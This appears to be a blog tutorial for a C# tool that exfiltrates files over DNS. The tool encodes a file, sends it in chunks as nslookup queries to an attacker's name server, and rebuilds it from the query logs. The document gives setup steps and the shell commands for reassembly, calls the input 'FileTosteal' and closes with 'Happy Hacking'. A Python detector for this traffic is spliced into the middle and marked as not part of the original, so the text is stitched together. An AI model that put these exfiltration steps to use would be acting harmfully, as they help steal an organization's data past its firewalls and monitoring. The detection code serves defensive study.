What is it?

Bad guys use various methods to exfiltrate data from an organization or any other target; basically, they need to get the data out without being detected. Most organizations use firewalls and IDS to secure their network but still allow DNS (incoming/outgoing) 😀, so over DNS we can transfer files and other important stuff 😉. Here I wrote a simple C# script to demonstrate the attack. For Educational Purposes Only.

How does it work?

The idea is simple: the script encodes your data, splits it into small parts and makes nslookup requests for them against a remote server; you then parse the query logs on that server and decode the file from them.
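Seen from the server-side query log the script relies on, the same traffic pattern (many long, high-entropy base64 labels queried under one domain) is what a defender looks for. The Python below is an added example, not part of the original script: it scans constructed BIND-style query-log lines and reports any domain that received several distinct encoded chunks; the log layout, the thresholds and the domain names are assumptions.

```python
import math
import re
from collections import defaultdict

# Constructed sample in a BIND-style query-log layout (not taken from the original page).
# Three queries carry long base64 labels under one domain; the rest is ordinary traffic.
SAMPLE_LOG = """\
client 10.0.0.5#53412: query: www.example.org IN A + (10.0.0.1)
client 10.0.0.5#53413: query: Zm9vYmFyYmF6cXV4cXV1eA==.attacker-dns.test IN A + (10.0.0.1)
client 10.0.0.5#53414: query: YW5vdGhlciBjaHVuayBvZiBkYXRh.attacker-dns.test IN A + (10.0.0.1)
client 10.0.0.5#53415: query: dGhpcmQgY2h1bmsgb2YgZGF0YQ==.attacker-dns.test IN A + (10.0.0.1)
client 10.0.0.7#40001: query: cdn-static-assets-01.example.org IN A + (10.0.0.1)
"""

QUERY_RE = re.compile(r"client (\S+)#\d+: query: (\S+) IN ")
B64_LABEL = re.compile(r"^[A-Za-z0-9+/]+={0,2}$")  # plain base64 alphabet; base32 variants would differ


def shannon_entropy(s):
    """Bits of entropy per character; encoded data scores well above ordinary hostnames."""
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(n / len(s) * math.log2(n / len(s)) for n in counts.values())


def suspicious_label(label, min_len=20, min_entropy=3.0):
    """A label that is long, purely base64 and high-entropy is likely an encoded chunk."""
    return (len(label) >= min_len and B64_LABEL.match(label) is not None
            and shannon_entropy(label) >= min_entropy)


def detect_exfil(log_text, min_chunks=3):
    """Return {base_domain: {"chunks": n, "clients": [...]}} for every domain that
    received at least min_chunks distinct encoded labels, i.e. the file-splitting pattern."""
    chunks, clients = defaultdict(set), defaultdict(set)
    for line in log_text.splitlines():
        m = QUERY_RE.search(line)
        if not m:
            continue
        client, qname = m.groups()
        labels = qname.rstrip(".").split(".")
        if len(labels) < 3:  # need at least chunk.domain.tld
            continue
        first, base = labels[0], ".".join(labels[1:])
        if suspicious_label(first):
            chunks[base].add(first)
            clients[base].add(client)
    return {base: {"chunks": len(c), "clients": sorted(clients[base])}
            for base, c in chunks.items() if len(c) >= min_chunks}
```

Running detect_exfil(SAMPLE_LOG) flags only attacker-dns.test; the hyphenated CDN label fails the base64 check and short labels never reach the entropy test.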

Prerequisite

A Linux box with a DNS server; you also need to enable DNS query logging 🙂

DnsExfiltration Script

This is what my configuration files look like:

Getting started

1. Download and edit the DnsExfiltration script:

   static String Domain = "YOUR-DOMAIN-NAME"; // add your bind domain
   static String NSserver = "YOUR-NAME-SERVER"; // add your dns server ip address

2. Call the ConvertInto64(string FileTosteal, string PathTosaveEncodedFile) function in the main method.

3. Call SendFile(string PathTosaveEncodedFile).

4. On the Linux box, open a terminal and run these commands to reassemble the file (the dot before the domain is escaped so it matches only a literal dot):

   egrep -o "[a-zA-Z0-9+/]+={0,2}[a-zA-Z0-9+/]+={0,2}\.YOUR-DOMAIN-NAME" /var/log/qrlog | cut -d . -f1 | uniq | awk '!a[$0]++' > /pathToSave/file.bin
   base64 -d file.bin > decoded.jpg

Done!

Demo Video

I tested this script with the following file types and it works 🙂

jpg 1MB

mp3 3MB

exe 1MB

Happy Hacking!

Reference

https://community.infoblox.com/t5/Community-Blog/DNS-Data-Exfiltration-How-it-works/ba-p/3664